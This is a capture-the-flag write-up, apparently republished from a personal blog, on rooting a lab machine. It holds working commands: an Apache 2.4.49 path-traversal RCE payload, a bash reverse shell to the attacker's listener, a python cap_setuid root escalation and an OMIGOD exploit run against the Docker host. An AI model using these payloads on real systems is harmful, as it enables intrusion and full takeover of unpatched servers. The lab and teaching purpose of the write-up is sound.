Oh My WebServer - Write Up
source link: https://lanfran02.github.io/posts/ohmywebserver/
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
Table of Contents
Link | Level | Creator |
---|---|---|
Here | Medium | tinyb0y |
Reconn
Hey! Welcome back!
Once again we are running nmap
against this machine, to see what services are running!
└──╼ $sudo nmap -sS -sV -sC --min-rate 5000 10.10.239.45 -Pn -n
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-03-05 15:13 CET
Nmap scan report for 10.10.239.45
Host is up (0.13s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 e0:d1:88:76:2a:93:79:d3:91:04:6d:25:16:0e:56:d4 (RSA)
| 256 91:18:5c:2c:5e:f8:99:3c:9a:1f:04:24:30:0e:aa:9b (ECDSA)
|_ 256 d1:63:2a:36:dd:94:cf:3c:57:3e:8a:e8:85:00:ca:f6 (ED25519)
80/tcp open http Apache httpd 2.4.49 ((Unix))
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.49 (Unix)
|_http-title: Consult - Business Consultancy Agency Template | Home
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
A normal machine, with just 2 common ports open…
But one thing that called our attention:
The web server (Port 80) is running on apache/2.4.49
For that version we have a CVE-2021-42013! You can find more information about it here.
Just to confirm the version we did a simple curl
request to the machine, to check the Server
header.
└──╼ $curl -v http://10.10.239.45 | head
* Trying 10.10.239.45:80...
GET / HTTP/1.1
Host: 10.10.239.45
User-Agent: curl/7.74.0
Accept: */*
* Mark bundle as not supporting multiuse
HTTP/1.1 200 OK
Date: Sat, 05 Mar 2022 14:16:00 GMT
Server: Apache/2.4.49 (Unix)
Last-Modified: Wed, 23 Feb 2022 05:40:45 GMT
ETag: "e281-5d8a8e82e3140"
Accept-Ranges: bytes
Content-Length: 57985
Content-Type: text/html
And to check for the possible exploit, we checked the cgi-bin
folder.
└──╼ $curl http://10.10.239.45/cgi-bin/
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access this resource.</p>
</body></html>
And it’s active! So we can run the exploit and try luck!
└──╼ $curl 'http://10.10.239.45/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/bash' -d 'echo Content-Type: text/plain; echo; whoami && pwd && id' -H "Content-Type: text/plain"
daemon
/bin
uid=1(daemon) gid=1(daemon) groups=1(daemon)
Yay! We have RCE
!
Foothold - User
To get a reverse shell
we used 2 terminals. The first one is making a request with the exploit, and the second one is just waiting the connection.
=====Terminal 1======
└──╼ $curl 'http://10.10.239.45/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/bash' -d 'echo Content-Type: text/plain; echo; bash -i >& /dev/tcp/10.9.1.30/1337 0>&1' -H "Content-Type: text/plain"
=====Terminal 2======
└──╼ $nc -nlvp 1337
listening on [any] 1337 ...
connect to [10.9.1.30] from (UNKNOWN) [10.10.239.45] 40344
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
daemon@4a70924bafa0:/bin$ id;whoami;pwd
id;whoami;pwd
uid=1(daemon) gid=1(daemon) groups=1(daemon)
daemon
/bin
daemon@4a70924bafa0:/bin$
And we are in! But we are running as a daemon
, so we can’t get the user flag
:/
Enumerating the machine, we found out that the binary python3.7
has the cap_setuid
capability set! (You can learn more about how to exploit this with GTFOBIN)
daemon@4a70924bafa0:/bin$ getcap -r / 2>/dev/null
/usr/bin/python3.7 = cap_setuid+ep
daemon@4a70924bafa0:/bin$ python3.7 -c 'import os; os.setuid(0); os.system("/bin/sh")'
# id
uid=0(root) gid=1(daemon) groups=1(daemon)
# cat /root/user.txt
THM{[REDACTED]}
Yes! We now are root inside a docker
container and we can submit the user flag!
After enumerating quite a lot the machine, we just guessed that there’s maybe another machine (In this case the dockers’s host) in the adyacent IP. So basically, that the host is on 172.17.0.1
, since we are the 172.17.0.2
root@4a70924bafa0:/tmp# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 172.17.0.2 netmask 255.255.0.0 broadcast 172.17.255.255
ether 02:42:ac:11:00:02 txqueuelen 0 (Ethernet)
RX packets 3122 bytes 383708 (374.7 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 2172 bytes 2759329 (2.6 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
loop txqueuelen 1000 (Local Loopback)
RX packets 2 bytes 100 (100.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 2 bytes 100 (100.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
To confirm this assumption, we uploaded an static binary of nmap
from out machine. You can download it from here.
And we ran it against the supposed Host’s IP.
root@4a70924bafa0:/tmp# ./nmap 172.17.0.1 -p- --min-rate 5000
Starting Nmap 6.49BETA1 ( http://nmap.org ) at 2022-03-05 14:48 UTC
Unable to find nmap-services! Resorting to /etc/services
Cannot find nmap-payloads. UDP payloads are disabled.
Nmap scan report for ip-172-17-0-1.eu-west-1.compute.internal (172.17.0.1)
Cannot find nmap-mac-prefixes: Ethernet vendor correlation will not be performed
Host is up (-0.0014s latency).
Not shown: 65531 filtered ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
5985/tcp closed unknown
5986/tcp open unknown
MAC Address: 02:42:1A:89:70:8B (Unknown)
Nmap done: 1 IP address (1 host up) scanned in 39.82 seconds
Yes! We were right! And we have some open ports!
Searching on google for port 5986 service exploit
, we found this POC:
https://github.com/AlteredSecurity/CVE-2021-38647
This exploit is against the OHMIGOD
service, commonly runnnig on ports as 5986
.
Downloaded the exploit to the victim machine and tried to exploit it!
root@4a70924bafa0:/tmp# python3 exp.py -t 172.17.0.1 -c 'whoami;pwd;id;hostname;uname -a;cat /root/root.txt;'
root
/var/opt/microsoft/scx/tmp
uid=0(root) gid=0(root) groups=0(root)
ubuntu
Linux ubuntu 5.4.0-88-generic #99-Ubuntu SMP Thu Sep 23 17:29:00 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
THM{[REDACTED]}
And we rooted the machine!
That’s all from my side, hope you find this helpful!
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK